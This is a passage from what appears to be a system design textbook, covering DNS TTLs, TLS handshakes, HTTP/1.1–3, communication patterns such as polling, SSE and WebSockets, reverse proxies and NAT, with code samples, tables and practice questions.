# T-48h: set TTL to 60 (old TTL must expire first for this to take effect)
# T-0: change the record (clients converge within ~60s)
# T+24h: raise TTL back to 3600 to reduce lookup latency and query cost
#
# Caveat: some clients and JVMs cache DNS beyond the TTL — historically
# forever. Never rely on DNS alone for fast failover; pair it with a load
# balancer or a client that re-resolves.
Two architectural consequences. First, DNS-based load balancing is coarse: you can return different answers per region or weight them for a canary, but you cannot see request paths, and stale caches mean some clients keep using the old answer. Second, DNS is a dependency: if your resolver is unavailable, healthy services become unreachable, which is why large outages so often turn out to be DNS.
Key Takeaways
- DNS resolves names hierarchically (root, TLD, authoritative) with caching at every hop.
- TTL trades failover speed against lookup latency and query cost.
CNAMEcannot exist at a zone apex; useALIAS/ANAMErecords there.- DNS is a control plane and a dependency — never the only failover mechanism.
🧪 Practice
- Trace the records needed to serve
shop.example.comfrom a load balancer, plus email for the domain.- Plan a zero-downtime migration to a new load balancer using TTL changes, with a timeline.
- Interview: You changed a DNS record 10 minutes ago and some users still hit the old server. Explain why and how to design around it. (Hint: count every layer that could be holding a cached answer, including the application runtime.)
TLS Handshake and Certificates
Plain HTTP sends everything readable to anyone on the path, and offers no way to know the server you reached is the one you asked for. TLS fixes three things at once: confidentiality (nobody can read the traffic), integrity (nobody can modify it undetected), and authentication (the server proves it owns the domain). Every one of those costs round trips, which is why TLS shows up in latency budgets.
Authentication works through a chain of trust. A certificate authority (CA) that your operating system already trusts signs a certificate binding a public key to a domain name. The server presents that certificate; the client verifies the signature chain up to a trusted root, checks the name matches, and checks it has not expired or been revoked.
TLS 1.3 HANDSHAKE (1 RTT) vs TLS 1.2 (2 RTT)
TLS 1.2 TLS 1.3
Client Server Client Server
|-- ClientHello ---->| |-- ClientHello + key share -->|
|<-- ServerHello ----| |<-- ServerHello + key share --|
| Certificate | | Certificate, Finished |
|<-- ServerHelloDone-| |-- Finished ----------------->|
|-- KeyExchange ---->| |== application data =========>|
|-- Finished ------->|
|<-- Finished -------| 1 RTT (plus TCP's 1 RTT)
|== data ===========>|
2 RTT (plus TCP's 1 RTT)
Session resumption: 0 RTT for repeat visitors (with replay caveats).
Certificate chain: leaf (api.example.com) -> intermediate CA -> root CA
import ssl, socket, datetime
ctx = ssl.create_default_context() # verifies chain AND hostname by default
with socket.create_connection(("example.com", 443), timeout=5) as sock:
with ctx.wrap_socket(sock, server_hostname="example.com") as tls:
# ^ SNI: tells the server which cert to present,
# which is how one IP hosts many TLS domains
cert = tls.getpeercert()
print(tls.version()) # TLSv1.3
expires = datetime.datetime.strptime(cert["notAfter"],
"%b %d %H:%M:%S %Y %Z")
print("days until expiry:", (expires - datetime.datetime.utcnow()).days)
# Never do this in production — it disables the entire authentication guarantee
# and turns TLS into unauthenticated encryption:
# ctx.check_hostname = False
# ctx.verify_mode = ssl.CERT_NONE
Design decisions that follow from all this:
- Where to terminate. Terminating TLS at the load balancer or CDN is cheapest and keeps certificates in one place; terminating at each service gives end-to-end encryption. Many designs do both: terminate at the edge, then re-encrypt internally.
- Certificate expiry is an outage waiting to happen. Automate issuance and renewal (ACME/Let's Encrypt or a cloud CA) and alert well before expiry.
- mTLS (mutual TLS) makes the client present a certificate too, which is the standard way services authenticate each other inside a mesh.
- Session resumption and connection reuse matter more than cipher choice for latency: the fastest handshake is the one you do not perform.
Key Takeaways
- TLS provides confidentiality, integrity, and server authentication via a CA-signed certificate chain.
- TLS 1.3 handshakes in 1 RTT (0 RTT on resumption); TLS 1.2 needs 2.
- SNI lets one IP serve many domains; hostname verification is what makes the guarantee real.
- Automate certificate renewal and decide deliberately where TLS terminates.
🧪 Practice
- Count the round trips for a first-time HTTPS request over TLS 1.3 to a server 60 ms away, then for a resumed connection.
- Explain what breaks if a client skips hostname verification but still validates the certificate chain.
- Interview: How would you design certificate management for 200 microservices doing mTLS? (Hint: think about issuance, rotation frequency, and what happens if the issuing service is down.)
HTTP/1.1, HTTP/2, and HTTP/3
HTTP is the protocol almost all application traffic speaks, and its three live versions differ not in semantics — the same methods, headers, and status codes throughout — but in how efficiently they move those semantics over a network. Each version exists to remove the previous one's dominant bottleneck.
HTTP/1.1 sends one request at a time per connection. Keep-alive lets a connection be reused sequentially, but a slow response blocks everything behind it. Browsers worked around this by opening ~6 connections per origin, and developers worked around that by concatenating files and sprite-sheeting images.
HTTP/2 multiplexes many concurrent streams over a single TCP connection and compresses headers with HPACK, eliminating application-level head-of-line blocking. But all those streams still ride one TCP connection, so a single lost packet stalls every stream — TCP-level head-of-line blocking.
HTTP/3 solves that by moving to QUIC over UDP, where each stream has its own loss recovery. It also folds the transport and TLS handshakes together (1 RTT, or 0 on resumption) and identifies connections by an ID rather than the 4-tuple, so a phone switching from Wi-Fi to cellular keeps its connection alive.
SIX REQUESTS OVER EACH VERSION
HTTP/1.1 (6 connections) HTTP/2 (1 connection) HTTP/3 (1 QUIC conn)
conn1 [req1--------] [1|2|3|4|5|6 interleaved] [1|2|3|4|5|6]
conn2 [req2------] one TCP connection independent streams
conn3 [req3---------] packet loss stalls ALL loss stalls ONE
... streams stream
6x handshakes, 6x congestion 1 handshake, header 1 handshake,
windows, header repeated compression connection migration
// The semantics are identical across versions — this code is unchanged.
const res = await fetch("https://api.example.com/orders", {
headers: { "authorization": `Bearer ${token}` },
});
// What changes is the transport underneath, and therefore the guidance:
// - HTTP/1.1: bundle assets, minimize request count, use few connections
// - HTTP/2+: many small requests are fine; bundling can HURT caching
// because one changed byte invalidates the whole bundle
// - Server push existed in HTTP/2 and is deprecated; use `103 Early Hints`
// or <link rel=preload> instead.
| Feature | HTTP/1.1 | HTTP/2 | HTTP/3 |
|---|---|---|---|
| Transport | TCP | TCP | QUIC over UDP |
| Concurrency | 1 per connection | Multiplexed streams | Multiplexed streams |
| Head-of-line blocking | Application | TCP level | Per stream only |
| Header compression | None | HPACK | QPACK |
| Handshake RTTs (new) | 1 (TCP) + 2 (TLS 1.2) | 1 + 1 (TLS 1.3) | 1 combined |
| Connection migration | No | No | Yes |
| Best for | Simple/internal | Most web traffic | Mobile, lossy networks |
For internal service-to-service traffic the same reasoning leads to gRPC, which is built on HTTP/2 precisely for its multiplexing and header compression over long-lived connections.
Key Takeaways
- All three versions share HTTP semantics; they differ in transport efficiency.
- HTTP/2 removes application head-of-line blocking but inherits TCP's.
- HTTP/3 (QUIC over UDP) gives per-stream loss recovery, a combined handshake, and connection migration.
- Optimization advice inverts by version: bundle for HTTP/1.1, keep requests granular for HTTP/2 and later.
🧪 Practice
- Explain why concatenating 50 JavaScript files helps on HTTP/1.1 but can hurt on HTTP/2.
- A mobile client loses 2% of packets. Predict how HTTP/2 and HTTP/3 behave differently and why.
- Interview: Your internal RPC traffic is slow despite a fast network. Which HTTP version and connection strategy would you choose? (Hint: think about how many handshakes long-lived internal connections should ever perform.)
<a id="23-communication-patterns"></a>
2.3 Communication Patterns
Protocols determine how bytes move; communication patterns determine who initiates, who waits, and what happens when the other side is slow or gone.
Client-Server Model
Almost every system you will design is a variation on one idea: some processes ask for things and some processes provide them. Centralizing the provision gives you a single place to enforce authorization, validate data, hold the authoritative copy, and deploy fixes — which is why this model dominates despite putting all the load on one side.
The client initiates; the server listens. The asymmetry is the whole point: the server has a stable, discoverable address, while clients come and go, may be untrusted, and may be behind NAT with no reachable address at all.
[Browser] \
[Mobile] >---- request ----> [Load Balancer] ---> [Server] ---> [Database]
[CLI tool] / <--- response ---
Clients: many, untrusted, ephemeral, unaddressable
Servers: few, trusted, long-lived, discoverable
The server holds the authoritative state; the client holds a cached view.
The property that makes this model scale is statelessness. If a server keeps no per-client state between requests, any server can answer any request, so you can add servers freely and lose one without losing sessions. State does not disappear — it moves to a shared store (a database, a cache, or a signed token carried by the client).
# Stateful: this server cannot be load balanced without sticky sessions,
# and a restart logs everyone out.
SESSIONS = {} # lives in one process's memory
def handle_login_stateful(user, password):
token = new_token()
SESSIONS[token] = user # only THIS instance knows it
return token
# Stateless: any instance can serve any request; scale and restart freely.
def handle_login_stateless(user, password, redis, signing_key):
token = new_token()
redis.setex(f"sess:{token}", 3600, user.id) # shared state, explicit TTL
return token
# Alternative: a signed JWT carries the state in the token itself,
# removing the lookup entirely at the cost of not being revocable
# until it expires.
| Property | Client | Server |
|---|---|---|
| Initiates | Yes | No (responds) |
| Addressable | Usually not (NAT, mobile) | Yes (DNS name, stable IP) |
| Trust | Untrusted; validate everything | Trusted execution environment |
| Holds truth | A cached view | The authoritative copy |
| Scaling concern | Bandwidth, battery, cache size | Concurrency, statelessness |
The model's limitation is that servers cannot initiate. Any "push" to a client — a notification, a live update — requires one of the workarounds covered later in this subchapter, because the client is the only party that can open the connection.
Key Takeaways
- Clients initiate, servers respond; only servers have stable, reachable addresses.
- Centralization buys authorization, consistency, and deployability.
- Stateless servers are what make horizontal scaling and restarts painless — push state to a shared store or a signed token.
- Servers cannot initiate contact, which is why push requires special patterns.
🧪 Practice
- List three pieces of state a web server might hold and, for each, say where it should live to keep the server stateless.
- Explain why sticky sessions reduce fault tolerance and elasticity.
- Interview: A server stores uploaded files on local disk. What breaks when you scale to three instances behind a load balancer? (Hint: consider both the write path and a later read that lands elsewhere.)
Peer-to-Peer Model
The client-server model concentrates cost at the server: every byte a user downloads is a byte the operator pays to send. Peer-to-peer inverts that. Each participant is both client and server, so capacity grows with the number of participants instead of being consumed by them — the property that makes P2P attractive for content distribution and unavoidable for systems that must survive without central infrastructure.
The analogy is a potluck dinner versus a restaurant. The restaurant scales by hiring more cooks; the potluck scales because every new guest brings a dish.
CLIENT-SERVER PEER-TO-PEER
[Server] [P1]-----[P2]
/ | \ | \ / |
[C1] [C2] [C3] | \ / |
| [P3] |
Capacity: fixed, paid by operator [P4]-----[P5]
Failure: server down = all down
Capacity: grows with peers
Failure: peers leave constantly (churn)
Pure P2P is rare because discovery is hard: a new peer must find others, and peers behind NAT cannot accept inbound connections. Most real systems are hybrid — a small central service handles discovery, coordination, and NAT traversal, and the bulk data flows peer to peer.
# Hybrid P2P: the central service brokers, the peers carry the payload.
# 1. Peers register with a tracker/signaling server (small, cheap, central)
tracker.announce(peer_id="p7", content_hash="a3f9...", ip="203.0.113.7", port=51413)
# 2. A peer asks who else has the content
peers = tracker.get_peers(content_hash="a3f9...") # [p2, p4, p9]
# 3. NAT traversal: both peers punch outbound holes toward each other,
# coordinated through the server, because neither can accept inbound.
# If that fails, traffic falls back to a relay (TURN) — which costs the
# operator bandwidth again.
for p in peers:
conn = nat_traverse(p) or relay_via(TURN_SERVER, p)
fetch_chunks(conn, missing_chunk_ids) # bulk data, no server cost
# 4. Integrity cannot be assumed: peers are untrusted, so every chunk is
# verified against a hash from a trusted source.
assert sha256(chunk) == expected_hashes[chunk_id]
| Aspect | Client-server | Peer-to-peer |
|---|---|---|
| Capacity | Fixed; operator pays | Grows with peer count |
| Latency | Predictable | Variable; depends on peer proximity |
| Trust | Server is authoritative | Peers untrusted; verify everything |
| Discovery | DNS | Tracker, DHT, or gossip |
| NAT | Not a problem | A central problem |
| Consistency | Straightforward | Hard; no single source of truth |
| Real examples | Nearly all web APIs | BitTorrent, WebRTC media, blockchains, gossip membership |
P2P ideas appear inside server-side systems too: gossip protocols spread membership and failure information between nodes of a cluster without a coordinator, which is exactly the P2P trade — no single point of failure, at the cost of eventual rather than immediate consistency.
Key Takeaways
- P2P capacity grows with participants instead of being drained by them.
- Discovery and NAT traversal are the hard parts, which is why hybrid designs dominate.
- Peers are untrusted: verify every chunk cryptographically.
- Gossip inside clusters is P2P thinking applied server-side.
🧪 Practice
- Explain why a live sports stream to 10 million viewers is a good P2P candidate while a bank ledger is not.
- Describe how two peers behind separate NATs establish a direct connection, and what happens when it fails.
- Interview: Design content distribution for a game patch of 50 GB to 5 million players in one hour. (Hint: compute the aggregate bandwidth first, then decide which parts must stay centralized.)
Synchronous vs. Asynchronous Communication
When service A needs something from service B, it can either wait for the answer or not. That single choice determines how failures propagate, how the two services scale, and how hard the system is to reason about — which makes it one of the highest-leverage decisions in any architecture.
Synchronous communication is a phone call: the caller blocks until the callee answers. It is simple, immediate, and easy to debug, because the whole operation has one stack trace and one obvious result. Asynchronous communication is email: the sender hands off a message and continues. The callee processes it whenever it can, and the sender learns the outcome later, if at all.
The critical property is temporal coupling. In a synchronous call, both services must be healthy at the same instant. Availabilities multiply, and slowness propagates upstream: if B takes 5 seconds, A's threads are held for 5 seconds, and A's callers queue behind them. This is how one slow dependency takes down an entire request path.
SYNCHRONOUS ASYNCHRONOUS
A --request--> B A --publish--> [Queue] --deliver--> B
A (blocked) A continues immediately
A <-response-- B B processes when able; may retry
Availability: 0.999 x 0.999 = 0.998 A's availability is independent of B
Latency: A pays B's latency A pays only the enqueue (~1 ms)
Failure: propagates upstream absorbed by the queue (until it fills)
Result: immediate eventual; needs a callback/poll/event
# Synchronous: simple, but A's latency and availability now include B's.
def place_order_sync(order, inventory, payments, email):
inventory.reserve(order) # 40 ms — must succeed now (correctness)
payments.charge(order) # 300 ms — must succeed now (correctness)
email.send_confirmation(order) # 900 ms — does NOT need to be now
return "created" # total ~1240 ms; email outage = failed order
# Asynchronous where it is safe: keep only what correctness requires inline.
def place_order_mixed(order, inventory, payments, bus):
inventory.reserve(order) # sync: prevents overselling
payments.charge(order) # sync: user must know it worked
bus.publish("order.created", order.to_event()) # async: ~1 ms, fire and forget
return "created" # total ~341 ms
# The email service consumes order.created later. If it is down for an
# hour, orders still succeed and confirmations arrive when it recovers.
The decision rule is simple to state: make it synchronous when the caller cannot proceed correctly without the result, and asynchronous otherwise. Everything the user does not need before seeing a response — emails, analytics, search indexing, recommendations, webhooks — belongs off the critical path.
| Question | Synchronous | Asynchronous |
|---|---|---|
| Does the caller need the result to proceed? | Yes | No |
| Is the operation slow or bursty? | Bad fit | Good fit |
| Must failures be visible to the user now? | Yes | No |
| Can work be retried safely later? | Harder | Natural |
| Debugging difficulty | Low | Higher (distributed traces needed) |
Asynchrony is not free: it buys resilience and pays in complexity — eventual consistency, duplicate delivery, message ordering, dead letters, and the need for a way to report failures that nobody is waiting for.
Key Takeaways
- Synchronous calls create temporal coupling: availabilities multiply and slowness propagates upstream.
- Asynchronous messaging decouples availability and absorbs bursts, at the cost of eventual consistency.
- Keep only correctness-critical work synchronous; move the rest off the critical path.
- Async systems need idempotent consumers, dead-letter handling, and tracing.
🧪 Practice
- For a checkout flow, classify each step as sync or async: inventory reservation, payment, receipt email, loyalty points, fraud scoring, warehouse notification.
- Compute the end-to-end availability of a synchronous chain of six services at 99.9% each, then explain what a queue between steps 3 and 4 changes.
- Interview: Making a call async removed a failure mode but introduced a bug where users see stale data. What is happening and how do you handle it? (Hint: the write path and the read path no longer share a clock.)
Request-Response vs. Event-Driven
Two services can be connected in two fundamentally different ways. In request-response, the caller knows who it needs and asks them directly for something specific. In event-driven communication, a producer announces that something happened and does not know or care who reacts.
The difference is not the transport — both can run over HTTP or a queue — it is the direction of knowledge. Request-response is calling a specific colleague to ask a question. Event-driven is posting on a noticeboard: whoever cares subscribes, and adding a new reader requires no change from you.
REQUEST-RESPONSE (caller knows the callee)
[Order svc] --"charge this"--> [Payments]
[Order svc] --"reserve this"-> [Inventory]
[Order svc] --"send email"---> [Email]
Adding a consumer = changing Order svc. Order svc knows all 3.
EVENT-DRIVEN (producer knows nobody)
[Order svc] --"OrderCreated"--> [ topic ] --+--> [Payments]
+--> [Inventory]
+--> [Email]
+--> [Analytics] (added later,
no producer change)
# Request-response: an imperative command aimed at a known service.
response = payments_client.charge(order_id=42, amount=Decimal("19.99"))
if response.status != "captured":
raise PaymentFailed(response.reason) # the caller owns the outcome
# Event-driven: a factual statement about the past, addressed to no one.
bus.publish("order.created", {
"event_id": "9f1c...", # for consumer-side deduplication
"occurred_at": "2026-03-11T10:04:22Z",
"order_id": 42,
"amount": "19.99",
"currency": "EUR",
})
# Note the naming: events are past tense facts ("order.created"), never
# commands ("send_email"). If the producer names the reaction, it has just
# recreated coupling with extra steps.
| Dimension | Request-response | Event-driven |
|---|---|---|
| Coupling | Caller knows the callee | Producer knows nobody |
| Adding a consumer | Change the caller | Subscribe; no producer change |
| Result | Immediate and known | Eventual; unknown to the producer |
| Error handling | Caller sees and handles it | Consumer retries; producer unaware |
| Data flow | Pull what you need | Push what happened |
| Debugging | One trace, one stack | Follow the chain across consumers |
| Best for | Queries, user-facing commands | Fan-out, integration, audit trails |
Most real architectures use both, and the boundary tends to fall in a predictable place: queries and user-facing commands are request-response; notifications of state changes are events. A useful discipline is to keep events as statements of fact that a consumer can interpret independently — the moment an event's payload is shaped for one specific consumer, the coupling has come back.
Key Takeaways
- Request-response couples caller to callee; event-driven decouples producer from consumers entirely.
- Adding a consumer in an event-driven system requires no producer change — that is its main benefit.
- Name events as past-tense facts, never as commands.
- Use request-response for queries and user-facing commands; events for state-change fan-out.
🧪 Practice
- Rewrite three imperative calls ("send welcome email", "update search index", "grant loyalty points") as a single event plus consumers.
- Explain how a badly named event (
order.send_email) reintroduces coupling.- Interview: How do you debug a user report of "I never got my confirmation email" in an event-driven system? (Hint: name the artifacts you need at each hop and what identifier ties them together.)
Short Polling and Long Polling
Servers cannot initiate contact with clients, so any "live" feature has to be faked by the client asking repeatedly. Polling is the simplest way to do that, and understanding its cost is what motivates every push technique that follows.
Short polling asks on a fixed timer: "anything new?" Usually the answer is no, and you have paid for a request, a response, and possibly a TLS handshake to learn nothing. Long polling improves on it by asking the server to hold the request open until there is something to say (or a timeout fires), then immediately reconnecting. Data arrives as soon as it exists, with no wasted round trips in between.
SHORT POLLING (interval 5 s) LONG POLLING
C -->|? no t=0 C -->|? t=0
C -->|? no t=5 | (held open, server waits)
C -->|? no t=10 |
C -->|YES (data) t=15 <- up to 5 s |<-- data t=7 <- immediate
wasted: 3 of 4 requests C -->|? t=7 (reconnect)
latency: 0-5 s | (held open)
wasted: none
latency: ~0
cost: one held connection per client
// Short polling: simple, predictable load, but wasteful and laggy.
setInterval(async () => {
const res = await fetch(`/api/messages?since=${lastSeenId}`);
const msgs = await res.json();
if (msgs.length) render(msgs); // most calls return an empty array
}, 5000); // worst-case staleness: 5 seconds
// Long polling: the server holds the request until data exists or it times out.
async function longPoll() {
while (true) {
try {
// Timeout must be shorter than any proxy/load-balancer idle timeout,
// otherwise the connection is cut without a response.
const res = await fetch(`/api/messages?since=${lastSeenId}&wait=25`);
if (res.status === 200) {
const msgs = await res.json();
lastSeenId = msgs.at(-1).id; // cursor prevents gaps and dupes
render(msgs);
}
// 204 No Content = the wait expired with nothing new; just reconnect.
} catch (e) {
await sleep(backoff()); // back off on errors, do not hammer
}
}
}
| Aspect | Short polling | Long polling |
|---|---|---|
| Latency to new data | Up to the interval | Near zero |
| Wasted requests | Many (usually empty) | Almost none |
| Server connections | Brief, one per poll | One held open per client |
| Server memory | Low | Higher; needs async handlers |
| Infrastructure issues | None | Proxy timeouts, thread exhaustion |
| Complexity | Trivial | Moderate |
Long polling only scales if the server can hold connections cheaply — a thread-per-request server exhausts its pool at a few thousand clients, which is why async runtimes matter here. Both techniques remain useful: short polling for low-frequency status checks (a background job's progress), long polling as a robust fallback where WebSockets are blocked by corporate proxies.
Key Takeaways
- Polling exists because clients must initiate; servers cannot push unprompted.
- Short polling wastes requests and adds up to one interval of staleness.
- Long polling holds the request open for near-zero latency and near-zero waste, but ties up a connection per client.
- Long polling needs async servers and timeouts shorter than every proxy in the path.
🧪 Practice
- Calculate daily requests for 100,000 clients short polling every 3 seconds, then estimate the fraction that return no data.
- Explain why a long-poll timeout must be shorter than the load balancer's idle timeout, and what the user sees when it is not.
- Interview: When would you still choose short polling over WebSockets in 2026? (Hint: think about update frequency, client count, and what infrastructure sits between you and the user.)
Server-Sent Events
Many "live" features only need data to flow one way: stock tickers, live scores, build logs, progress bars, notification feeds, and streamed AI responses. Opening a full bidirectional socket for those is more machinery than the problem requires. Server-Sent Events (SSE) is the minimal answer — a single long-lived HTTP response that the server keeps writing to.
Because it is ordinary HTTP, SSE inherits everything HTTP already has: compression, authentication headers, cookies, proxies, HTTP/2 multiplexing, and observability. The browser API also handles reconnection automatically and replays missed events using an ID the server supplies — a feature you would otherwise have to build yourself.
SSE: ONE REQUEST, MANY RESPONSES
Client Server
|--- GET /events Accept: text/event-stream --->|
|<-- 200 Content-Type: text/event-stream ------| (response never ends)
|<-- data: {"price": 42.10} |
|<-- data: {"price": 42.35} |
| ...connection drops... |
|--- GET /events Last-Event-ID: 1043 --------->| (browser reconnects
|<-- data: {...} (resumes from 1044) | automatically)
// Client: three lines, with reconnection and resumption built in.
const es = new EventSource("/api/prices"); // GET only; cookies are sent
es.onmessage = (e) => render(JSON.parse(e.data));
es.addEventListener("alert", (e) => toast(e.data)); // named event types
es.onerror = () => { /* browser retries automatically; do not reconnect here */ };
# Server: the wire format is plain text, one field per line, blank line = end.
def price_stream(request):
def generate():
last_id = int(request.headers.get("Last-Event-ID", 0))
for event in price_feed.since(last_id): # resume where the client left
yield f"id: {event.id}\n" # enables Last-Event-ID resume
yield f"event: price\n" # optional named type
yield f"data: {json.dumps(event.data)}\n\n" # blank line ends the event
# Heartbeats keep proxies from closing an idle connection:
# yield ": keep-alive\n\n" (a comment line, ignored by the client)
return Response(generate(), mimetype="text/event-stream",
headers={"Cache-Control": "no-cache",
"X-Accel-Buffering": "no"}) # disable proxy buffering
| Aspect | SSE | WebSockets |
|---|---|---|
| Direction | Server to client only | Full duplex |
| Protocol | Plain HTTP | Upgraded protocol (ws://) |
| Data format | UTF-8 text only | Text or binary |
| Reconnection | Automatic, with Last-Event-ID | Manual, you implement it |
| Proxy/firewall friendliness | High (it is just HTTP) | Sometimes blocked |
| Connection limit | 6 per origin on HTTP/1.1 (fine on HTTP/2) | Not affected |
| Best for | Feeds, logs, progress, token streaming | Chat, games, collaborative editing |
The rule of thumb: if the client only needs to listen, use SSE. It is simpler, survives proxies better, and gives you reconnection for free. Reach for WebSockets when the client also needs to send frequently.
Key Takeaways
- SSE is a single long-lived HTTP response streaming text events server to client.
- Automatic reconnection with
Last-Event-IDreplay is built into the browser API.- Being plain HTTP means auth, compression, and proxies just work.
- Choose SSE for one-way streams; choose WebSockets when the client must also send.
🧪 Practice
- Write the SSE wire format for three events, one with a custom event type and one with an ID.
- Explain why heartbeats and disabled proxy buffering are necessary in production SSE.
- Interview: Design the transport for streaming an AI model's tokens to a browser. Justify SSE or WebSockets. (Hint: ask which direction carries the high-frequency traffic.)
WebSockets
Some interactions are genuinely conversational: chat, collaborative editing, multiplayer games, live trading. Both sides send frequently and unprompted, and neither polling nor a one-way stream fits. WebSockets provide a persistent, full-duplex connection over a single TCP connection, where either side can send a message at any time with almost no per-message overhead.
The connection begins as an ordinary HTTP request carrying an Upgrade header.
The server agrees with 101 Switching Protocols, and from that point the same
TCP connection speaks the WebSocket framing protocol instead of HTTP. Starting
as HTTP is what lets WebSockets traverse the existing web infrastructure —
ports 80 and 443, proxies, and load balancers.
UPGRADE HANDSHAKE
Client Server
|-- GET /ws HTTP/1.1 |
| Upgrade: websocket |
| Connection: Upgrade |
| Sec-WebSocket-Key: dGhlIHNhbXBs... |
|--------------------------------------->|
|<-- HTTP/1.1 101 Switching Protocols ---|
| Sec-WebSocket-Accept: s3pPLMBi... |
|<========= full duplex frames =========>|
either side sends, ~2-14 bytes of framing overhead per message
const ws = new WebSocket("wss://api.example.com/ws"); // wss = TLS; always use it
ws.onopen = () => ws.send(JSON.stringify({ type: "subscribe", room: "eng" }));
ws.onmessage = (e) => handle(JSON.parse(e.data));
// The browser does NOT reconnect for you — unlike SSE, this is your job.
ws.onclose = (e) => {
if (e.code !== 1000) scheduleReconnect(); // 1000 = normal closure
};
// Production checklist the naive example always misses:
// - exponential backoff WITH jitter, or every client reconnects in lockstep
// after a deploy and stampedes the server
// - application-level ping/pong to detect dead connections that TCP has not
// noticed yet (a silently dropped mobile connection can look "open" for
// minutes)
// - re-subscribe and re-authenticate after each reconnect; the server kept
// no memory of you
// - bound the outbound buffer: a slow client must be dropped, not allowed to
// consume unbounded server memory
The architectural cost of WebSockets is statefulness. Each connection is pinned to one server instance for its entire life, which changes several things at once:
| Concern | Consequence |
|---|---|
| Load balancing | Connections are long-lived, so load spreads unevenly after scaling |
| Deployments | Every deploy disconnects every client; drain and stagger rollouts |
| Fan-out | A message for a user on another instance needs a pub/sub backplane (Redis, Kafka) |
| Capacity | Memory per connection (buffers, subscriptions) sets the ceiling — typically tens of thousands per node |
| Autoscaling | New instances get no traffic until clients reconnect |
SCALING WEBSOCKETS: THE BACKPLANE
[client A] --- [ws node 1] --\ /-- [ws node 1] --- [client A]
>--- [Redis pub/sub] <
[client B] --- [ws node 2] --/ \-- [ws node 2] --- [client B]
Node 2 receives B's message, publishes to the channel; node 1 delivers to A.
Without a backplane, users are only reachable if they share an instance.
Key Takeaways
- WebSockets give full-duplex, low-overhead messaging after an HTTP upgrade handshake.
- Connections are stateful and pinned to one instance, complicating balancing, deploys, and autoscaling.
- Reconnection, heartbeats, and re-subscription are your responsibility, not the browser's.
- Cross-instance delivery requires a pub/sub backplane.
🧪 Practice
- Estimate how many WebSocket connections one server holds given 40 KB of memory per connection and 16 GB of usable RAM.
- Describe what happens to 500,000 connected clients during a rolling deploy and how to make it non-disruptive.
- Interview: Design a chat system for 1 million concurrent users. (Hint: start from connections per node, then explain how a message reaches a recipient connected to a different node.)
<a id="24-network-infrastructure"></a>
2.4 Network Infrastructure
Between a client and your application code sits a stack of network machinery that shapes latency, security, and cost; designing it deliberately is as much part of system design as choosing a database.
Proxies and Reverse Proxies
A proxy is a server that sits in the middle of a connection and speaks on someone's behalf. The value is that it gives you a single place to apply policy — caching, authentication, rate limiting, logging, TLS termination — without touching either endpoint. The direction it faces determines whose behalf it acts on, and that single distinction is the whole concept.
A forward proxy sits in front of clients and represents them to the internet. The client knows about it; the destination does not know who the real client was. A reverse proxy sits in front of servers and represents them to the world. The client thinks it is talking to the server; it has no idea how many machines are behind it.
The analogy: a forward proxy is a personal assistant making calls for you. A reverse proxy is a company switchboard — callers dial one number and never learn which desk answered.
FORWARD PROXY (acts for clients) REVERSE PROXY (acts for servers)
[Employee]--\ /--[App server 1]
[Employee]---> [Proxy] --> Internet /
[Employee]--/ [Client]--> [Reverse proxy] --[App server 2]
\
Use: corporate egress control, \--[App server 3]
content filtering, shared cache, Use: load balancing, TLS
hiding client identity termination, caching,
rate limiting, routing
# A reverse proxy configuration doing five jobs at once.
upstream api_backend {
least_conn; # send to the instance with fewest conns
server 10.0.1.10:8080 max_fails=3 fail_timeout=30s;
server 10.0.1.11:8080 max_fails=3 fail_timeout=30s;
keepalive 32; # reuse upstream connections (see 2.1)
}
server {
listen 443 ssl http2;
ssl_certificate /etc/ssl/api.crt; # 1. TLS terminates here
ssl_certificate_key /etc/ssl/api.key;
location /static/ {
proxy_cache static_cache; # 2. cache: origin never sees these
proxy_cache_valid 200 10m;
proxy_pass http://api_backend;
}
location /api/ {
proxy_pass http://api_backend; # 3. load balance across upstreams
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme; # 4. preserve client context
proxy_read_timeout 30s; # 5. bound slow upstreams
}
}
That X-Forwarded-For header matters more than it looks: once a proxy is in
the path, the application sees the proxy's IP as the client address. Rate
limiting, geolocation, and audit logging all break silently unless the app
reads the forwarded header — and trusts it only from known proxies, since
clients can forge it.
| Capability | Forward proxy | Reverse proxy |
|---|---|---|
| Sits in front of | Clients | Servers |
| Who configures it | The client/network | The service operator |
| Hides | The client's identity | The server topology |
| Typical duties | Egress policy, filtering, shared cache | TLS, load balancing, caching, WAF, routing |
| Client aware of it | Yes | No |
Reverse proxies are the foundation of most edge infrastructure: load balancers, API gateways, CDNs, and service mesh sidecars are all specialized reverse proxies.
Key Takeaways
- Forward proxies represent clients; reverse proxies represent servers.
- A reverse proxy centralizes TLS, caching, load balancing, and rate limiting in one place.
- Proxies replace the observed client IP — use
X-Forwarded-For, and trust it only from known hops.- Load balancers, API gateways, CDNs, and mesh sidecars are all reverse proxies.
🧪 Practice
- Classify each as forward or reverse proxy usage: a corporate web filter, a CDN edge node, a service mesh sidecar handling outbound calls, an API gateway.
- Explain what breaks in rate limiting and geolocation when the app reads the socket's peer IP behind a proxy.
- Interview: Why is trusting
X-Forwarded-Forfrom any source a security problem, and how do you do it safely? (Hint: think about who can set a header and how many trusted hops are actually in your path.)
Network Address Translation
There are about 4.3 billion IPv4 addresses and far more devices, so the internet's stopgap was to let many private machines share a few public ones. NAT is the mechanism: a device rewrites the source address of outbound packets to its own public address, remembers the mapping, and reverses the rewrite on the way back.
The analogy is an office building with one street address and an internal mail room. Outbound letters all carry the building's address; the mail room keeps a ledger so replies find the right desk.
SOURCE NAT (outbound)
[10.0.1.7:52431] --> [NAT gateway] --> [203.0.113.9:41002] --> [server:443]
Translation table (connection tracking):
+-------------------+-----------------------+-------------------+
| internal | external | destination |
+-------------------+-----------------------+-------------------+
| 10.0.1.7:52431 | 203.0.113.9:41002 | 93.184.216.34:443 |
| 10.0.2.4:51002 | 203.0.113.9:41003 | 93.184.216.34:443 |
+-------------------+-----------------------+-------------------+
Return traffic to 203.0.113.9:41002 is rewritten back to 10.0.1.7:52431.
Nothing on the internet can initiate a connection inward: there is no
table entry until the inside starts one. That is an accidental firewall.
Two directions matter. SNAT (source NAT) is the outbound case above — the default for private subnets reaching the internet. DNAT (destination NAT), also called port forwarding, rewrites the destination so an external address reaches a specific internal host; it is how a load balancer's public IP maps to private backends.
# NAT's hidden capacity limit: it is a connection-tracking table, and the
# port space per (external IP, destination IP, destination port) is finite.
PORTS_PER_EXTERNAL_IP = 65_535 - 1_024 # ~64,511 usable
print(PORTS_PER_EXTERNAL_IP) # 64511
